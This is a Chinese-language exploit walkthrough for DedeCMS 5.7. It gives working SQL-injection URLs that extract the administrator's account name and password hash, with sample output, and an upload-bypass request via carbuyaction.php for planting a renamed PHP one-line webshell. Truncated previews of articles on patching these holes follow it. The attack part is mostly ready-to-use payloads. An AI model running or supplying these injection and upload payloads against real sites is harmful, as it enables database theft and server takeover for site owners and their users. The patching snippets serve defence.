會員中心查詢會員資訊語句過濾不嚴,導致url可提交注入引數;
會員中心有上傳動作過濾不嚴,導致上傳漏洞
詳細說明:
①注入漏洞。
這站 首先訪問「/data/admin/ver.txt」頁面獲取系統最後公升級時間,
然後訪問「/member/ajax_membergroup.php?action=post&membergroup=1」
頁面,如圖說明存在該漏洞。
然後寫上語句
檢視管理員帳號
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
admin www.2cto.com
檢視管理員密碼
/member/ajax_membergroup.php?action=post&membergroup=@`'`%20union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@
8d29b1ef9f8c5a5af429
檢視管理員密碼
得到的是19位的,去掉前三位和最後一位,得到管理員的16位md5
8d29b1ef9f8c5a5af42
9cmd5沒解出來 只好測試第二個方法
②上傳漏洞:
只要登陸會員中心,然後訪問頁面鏈結
「/plus/carbuyaction.php?dopost=memclickout&oid=s-p0rn8888&rs[code]=../dialog/select_soft_post」
如圖,說明通過「/plus/carbuyaction.php」已經成功呼叫了上傳頁面「/dialog/select_soft_post」
於是將php一句話木馬副檔名改為「rar」等,利用提交頁面upload1.htm
plus/carbuyaction.php?dopost=memclickout&oid=s-p0rn8888&rs[code]=../dialog/select_soft_post" method="post"
enctype="multipart/form-data" name="form1">
file:
newname:
提交
織夢5 7注入加上傳漏洞
織夢5.7注入加上傳漏洞 分類 安全 2012 05 5 擼過12,571次 2人扯談 會員中心查詢會員資訊語句過濾不嚴,導致url可提交注入引數 會員中心有上傳動作過濾不嚴,導致上傳漏洞 詳細說明 注入漏洞。這站 首先訪問 data admin ver.txt 頁面獲取系統最後公升級時間,然後訪問...
織夢CMS上傳漏洞修復
近段時間老是發現 title被注入其他資訊,應該是被植入 還是什麼的,非常困鬧,在 找了一些織夢漏洞的修補方法。任意檔案上傳漏洞修復 一 include dialog select soft post.php檔案,搜尋 大概在72行的樣子 fullfilename cfg basedir.activ...
織夢漏洞修復含任意檔案上傳漏洞與注入漏洞
很多人說織夢dedecms不好,因為用的人多了,找漏洞的人也多了,那麼如果我們能修復的話,這些都不是問題,今天我就為大家講解一下如何修復任意檔案上傳漏洞與注入漏洞。任意檔案上傳漏洞修復包含乙個檔案 include dialog select soft post.php sql注入漏洞包含5個檔案 i...